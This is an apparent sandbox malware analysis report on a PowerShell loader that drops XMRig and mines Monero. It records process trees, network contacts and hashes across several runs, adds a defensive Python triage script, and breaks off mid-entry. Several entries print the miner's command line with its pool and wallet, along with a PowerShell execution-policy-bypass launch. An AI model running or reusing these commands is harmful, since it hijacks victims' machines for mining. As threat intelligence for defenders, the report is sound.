Malware Analysis Report

2025-04-19 15:52

Sample ID: 240522-ytyzraee81
Target: main2.rar
SHA256: 08f3805606e1d457ed9e80b975bee0320651e3d5626e9e7cb896fd45e8fd0f7b
Tags: xmrig, execution, miner
Score: 10/10

Table of Contents

Analysis Overview

MITRE ATT&CK (Enterprise Matrix V15)

Analysis: static1 (Detonation Overview, Signatures)

Analysis: behavioral2, behavioral8, behavioral10, behavioral13, behavioral15, behavioral17, behavioral5, behavioral9, behavioral16, behavioral32, behavioral1, behavioral31, behavioral24, behavioral26, behavioral29, behavioral18, behavioral6, behavioral7, behavioral11, behavioral14, behavioral23, behavioral3, behavioral12, behavioral19, behavioral28, behavioral4, behavioral20, behavioral22, behavioral25, behavioral27, behavioral30, behavioral21 (each with Detonation Overview, Command Line, Signatures, Processes, Network, Files)

Analysis Overview

Score: 10/10

SHA256: 08f3805606e1d457ed9e80b975bee0320651e3d5626e9e7cb896fd45e8fd0f7b

Threat Level: Known bad

The file main2.rar was found to be: Known bad.

Malicious Activity Summary

xmrig execution miner

XMRig Miner payload

xmrig

Blocklisted process makes network request

Executes dropped EXE

Command and Scripting Interpreter: PowerShell

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

Suspicious use of FindShellTrayWindow

Suspicious use of WriteProcessMemory

Suspicious behavior: LoadsDriver

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported: 2024-05-22 20:05

Signatures

N/A

Analysis: behavioral2

Detonation Overview

Submitted: 2024-05-22 20:05
Reported: 2024-05-22 20:36
Platform: win10-20240404-en
Max time kernel: 1798s
Max time network: 1782s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (2).ps1"

Signatures

XMRig Miner payload

miner

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (2).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.8.0.8.0.8.0.8.0.ip6.arpa udp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 48.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 74.239.69.13.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_d3mnrk4e.qcu.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

Analysis: behavioral8

Detonation Overview

Submitted: 2024-05-22 20:05
Reported: 2024-05-22 20:36
Platform: win11-20240426-en
Max time kernel: 1791s
Max time network: 1795s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (3).ps1"

Signatures

XMRig Miner payload

miner

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (3).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 185.199.110.133:443 objects.githubusercontent.com tcp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 100.58.20.217.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_400mirsq.2al.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

Analysis: behavioral10

Detonation Overview

Submitted: 2024-05-22 20:05
Reported: 2024-05-22 20:36
Platform: win10-20240404-en
Max time kernel: 1792s
Max time network: 1774s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (4).ps1"

Signatures

XMRig Miner payload

miner

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (4).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.110.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 133.110.199.185.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 29.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 88.16.208.104.in-addr.arpa udp
US 8.8.8.8:53 145.83.221.88.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_lcsjreac.vpr.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

Analysis: behavioral13

Detonation Overview

Submitted: 2024-05-22 20:05
Reported: 2024-05-22 20:36
Platform: win10-20240404-en
Max time kernel: 1798s
Max time network: 1762s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (5).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A (56 rows in the report, every field N/A; the match is on the memory dumps listed under Files)

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (5).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
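
Added example (not part of the sandbox report, and not XMRig's or PowerShell's code): a small Python triage script that turns process command lines like the two above into indicators. The two sample lines are copied from this analysis; the function names, the finding layout and the list of accepted option spellings are this example's own assumptions. It extracts the stratum pool host and port, whether TLS is used, the mining algorithm, and splits the -u value into coin, wallet and worker using the coin:address.worker layout visible above; separately it flags powershell.exe launched with an execution-policy override against a script under AppData\Local\Temp.

```python
"""Turn loader and miner command lines from a sandbox report into IOCs.

Added example for triaging process trees like the one above; it is not
code from the sandbox, from XMRig or from PowerShell. The two command lines
in SAMPLE_CMDLINES are copied from the report; every function name and the
'finding' dictionary layout are this example's own assumptions.
"""
import re
from urllib.parse import urlsplit

# Constructed sample: the two process command lines shown in this analysis.
SAMPLE_CMDLINES = [
    r'powershell.exe -ExecutionPolicy bypass -File '
    r'"C:\Users\Admin\AppData\Local\Temp\file01 - copia (5).ps1"',
    r'"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx '
    r'-o stratum+ssl://rx.unmineable.com:443 '
    r'-u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRs'
    r'Y9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x',
]

# Option spellings XMRig accepts for the fields we care about (assumed list).
MINER_OPTS = {
    "-a": "algo", "--algo": "algo",
    "-o": "pool", "--url": "pool",
    "-u": "user", "--user": "user",
    "-p": "pass", "--pass": "pass",
}
POOL_SCHEMES = {"stratum+tcp", "stratum+ssl", "stratum+tls"}


def tokenize(cmdline):
    """Split a Windows command line on whitespace, keeping quoted spans whole.
    Backslashes are ordinary characters here, unlike shlex in POSIX mode."""
    return [quoted or bare for quoted, bare in re.findall(r'"([^"]*)"|(\S+)', cmdline)]


def parse_miner_args(tokens):
    """Map miner options to values; accepts both '-o url' and '--url=url'."""
    args, i = {}, 1
    while i < len(tokens):
        tok = tokens[i]
        if tok.startswith("--") and "=" in tok:
            key, _, val = tok.partition("=")
            if key in MINER_OPTS:
                args[MINER_OPTS[key]] = val
            i += 1
        elif tok in MINER_OPTS and i + 1 < len(tokens):
            args[MINER_OPTS[tok]] = tokens[i + 1]
            i += 2
        else:
            i += 1
    return args


def miner_finding(cmdline):
    """Pool and wallet IOCs if the line looks like a stratum miner, else None."""
    tokens = tokenize(cmdline)
    if not tokens:
        return None
    args = parse_miner_args(tokens)
    pool = args.get("pool")
    if not pool:
        return None
    url = urlsplit(pool)
    if url.scheme not in POOL_SCHEMES:
        return None
    user = args.get("user", "")
    # COIN:address.worker layout seen in the report (unMineable style).
    if ":" in user:
        coin, _, rest = user.partition(":")
    else:
        coin, rest = None, user
    address, _, worker = rest.partition(".")
    return {
        "image": tokens[0],
        "algo": args.get("algo"),
        "pool_host": url.hostname,
        "pool_port": url.port,
        "tls": url.scheme != "stratum+tcp",
        "coin": coin,
        "wallet": address,
        "worker": worker or None,
    }


def loader_finding(cmdline):
    """Flag powershell.exe run with an execution-policy override on a script in %TEMP%."""
    tokens = tokenize(cmdline)
    if not tokens or not tokens[0].lower().endswith("powershell.exe"):
        return None
    low = [t.lower() for t in tokens]
    policy = script = None
    for i, tok in enumerate(low[:-1]):
        if tok in ("-executionpolicy", "-ep", "-ex", "-exec"):  # common abbreviations
            policy = low[i + 1]
        elif tok in ("-file", "-f"):
            script = tokens[i + 1]
    if policy not in ("bypass", "unrestricted"):
        return None
    return {
        "image": tokens[0],
        "policy": policy,
        "script": script,
        "script_in_temp": bool(script) and "\\appdata\\local\\temp\\" in script.lower(),
    }


def triage(cmdlines):
    """Run both checks over a list of process command lines, in input order."""
    results = []
    for cmd in cmdlines:
        for check in (loader_finding, miner_finding):
            hit = check(cmd)
            if hit:
                hit["kind"] = check.__name__.replace("_finding", "")
                results.append(hit)
    return results


if __name__ == "__main__":
    for finding in triage(SAMPLE_CMDLINES):
        print(finding)
```

Running the block prints one finding per process. Pool host, wallet and worker name are the stable pivots for hunting: the dropped path and the script name change between the copies on this page, the wallet string does not.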

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 43.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 15.173.189.20.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp

Files

memory/3660-0-0x00007FFAB4823000-0x00007FFAB4824000-memory.dmp

memory/3660-5-0x000002A376100000-0x000002A376122000-memory.dmp

memory/3660-8-0x00007FFAB4820000-0x00007FFAB520C000-memory.dmp

memory/3660-9-0x000002A376760000-0x000002A3767D6000-memory.dmp

memory/3660-10-0x00007FFAB4820000-0x00007FFAB520C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_sgmxhzwd.kyi.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/3660-25-0x00007FFAB4820000-0x00007FFAB520C000-memory.dmp

memory/3660-61-0x000002A376160000-0x000002A37616A000-memory.dmp

memory/3660-48-0x000002A376720000-0x000002A376732000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/4820-90-0x00000225B2110000-0x00000225B2130000-memory.dmp

memory/3660-91-0x00007FFAB4823000-0x00007FFAB4824000-memory.dmp

memory/4820-92-0x00007FF772B20000-0x00007FF773753000-memory.dmp

memory/3660-93-0x00007FFAB4820000-0x00007FFAB520C000-memory.dmp

memory/4820-94-0x00007FF772B20000-0x00007FF773753000-memory.dmp

memory/4820-95-0x00007FF772B20000-0x00007FF773753000-memory.dmp

memory/4820-96-0x00007FF772B20000-0x00007FF773753000-memory.dmp

memory/4820-97-0x00007FF772B20000-0x00007FF773753000-memory.dmp

memory/4820-98-0x00007FF772B20000-0x00007FF773753000-memory.dmp

memory/4820-99-0x00007FF772B20000-0x00007FF773753000-memory.dmp

memory/4820-100-0x00007FF772B20000-0x00007FF773753000-memory.dmp

memory/4820-101-0x00007FF772B20000-0x00007FF773753000-memory.dmp

memory/4820-102-0x00007FF772B20000-0x00007FF773753000-memory.dmp

memory/4820-103-0x00007FF772B20000-0x00007FF773753000-memory.dmp

memory/4820-104-0x00007FF772B20000-0x00007FF773753000-memory.dmp

memory/4820-105-0x00007FF772B20000-0x00007FF773753000-memory.dmp

memory/4820-106-0x00007FF772B20000-0x00007FF773753000-memory.dmp

memory/4820-107-0x00007FF772B20000-0x00007FF773753000-memory.dmp

memory/4820-108-0x00007FF772B20000-0x00007FF773753000-memory.dmp

memory/4820-109-0x00007FF772B20000-0x00007FF773753000-memory.dmp

memory/4820-110-0x00007FF772B20000-0x00007FF773753000-memory.dmp

memory/4820-111-0x00007FF772B20000-0x00007FF773753000-memory.dmp

memory/4820-112-0x00007FF772B20000-0x00007FF773753000-memory.dmp

memory/4820-113-0x00007FF772B20000-0x00007FF773753000-memory.dmp

memory/4820-114-0x00007FF772B20000-0x00007FF773753000-memory.dmp

memory/4820-115-0x00007FF772B20000-0x00007FF773753000-memory.dmp

memory/4820-116-0x00007FF772B20000-0x00007FF773753000-memory.dmp

memory/4820-117-0x00007FF772B20000-0x00007FF773753000-memory.dmp

memory/4820-118-0x00007FF772B20000-0x00007FF773753000-memory.dmp

memory/4820-119-0x00007FF772B20000-0x00007FF773753000-memory.dmp

memory/4820-120-0x00007FF772B20000-0x00007FF773753000-memory.dmp

memory/4820-121-0x00007FF772B20000-0x00007FF773753000-memory.dmp

memory/4820-122-0x00007FF772B20000-0x00007FF773753000-memory.dmp

memory/4820-123-0x00007FF772B20000-0x00007FF773753000-memory.dmp

memory/4820-124-0x00007FF772B20000-0x00007FF773753000-memory.dmp

memory/4820-125-0x00007FF772B20000-0x00007FF773753000-memory.dmp

memory/4820-126-0x00007FF772B20000-0x00007FF773753000-memory.dmp

memory/4820-127-0x00007FF772B20000-0x00007FF773753000-memory.dmp

memory/4820-128-0x00007FF772B20000-0x00007FF773753000-memory.dmp

memory/4820-129-0x00007FF772B20000-0x00007FF773753000-memory.dmp

memory/4820-130-0x00007FF772B20000-0x00007FF773753000-memory.dmp

memory/4820-131-0x00007FF772B20000-0x00007FF773753000-memory.dmp

memory/4820-132-0x00007FF772B20000-0x00007FF773753000-memory.dmp

memory/4820-133-0x00007FF772B20000-0x00007FF773753000-memory.dmp

memory/4820-134-0x00007FF772B20000-0x00007FF773753000-memory.dmp

memory/4820-135-0x00007FF772B20000-0x00007FF773753000-memory.dmp

memory/4820-136-0x00007FF772B20000-0x00007FF773753000-memory.dmp

memory/4820-137-0x00007FF772B20000-0x00007FF773753000-memory.dmp

memory/4820-138-0x00007FF772B20000-0x00007FF773753000-memory.dmp

memory/4820-139-0x00007FF772B20000-0x00007FF773753000-memory.dmp

memory/4820-140-0x00007FF772B20000-0x00007FF773753000-memory.dmp

memory/4820-141-0x00007FF772B20000-0x00007FF773753000-memory.dmp

memory/4820-142-0x00007FF772B20000-0x00007FF773753000-memory.dmp

memory/4820-143-0x00007FF772B20000-0x00007FF773753000-memory.dmp

memory/4820-144-0x00007FF772B20000-0x00007FF773753000-memory.dmp

memory/4820-145-0x00007FF772B20000-0x00007FF773753000-memory.dmp

memory/4820-146-0x00007FF772B20000-0x00007FF773753000-memory.dmp

memory/4820-147-0x00007FF772B20000-0x00007FF773753000-memory.dmp

memory/4820-148-0x00007FF772B20000-0x00007FF773753000-memory.dmp

memory/4820-149-0x00007FF772B20000-0x00007FF773753000-memory.dmp

memory/4820-150-0x00007FF772B20000-0x00007FF773753000-memory.dmp

memory/4820-151-0x00007FF772B20000-0x00007FF773753000-memory.dmp

memory/4820-152-0x00007FF772B20000-0x00007FF773753000-memory.dmp

memory/4820-153-0x00007FF772B20000-0x00007FF773753000-memory.dmp

memory/4820-154-0x00007FF772B20000-0x00007FF773753000-memory.dmp

memory/4820-155-0x00007FF772B20000-0x00007FF773753000-memory.dmp

Analysis: behavioral15

Detonation Overview

Submitted 2024-05-22 20:05
Reported 2024-05-22 20:36
Platform win10v2004-20240426-en
Max time kernel 1790s
Max time network 1742s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (5).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A (64 rows in the report, every field N/A; the match is on the memory dumps listed under Files)

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (5).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.111.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 133.111.199.185.in-addr.arpa udp
US 8.8.8.8:53 140.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 183.142.211.20.in-addr.arpa udp
US 8.8.8.8:53 183.59.114.20.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 240.197.17.2.in-addr.arpa udp
US 8.8.8.8:53 31.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 10.73.50.20.in-addr.arpa udp

Files

memory/1724-0-0x00007FFB22493000-0x00007FFB22495000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_tl41su3x.xvv.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
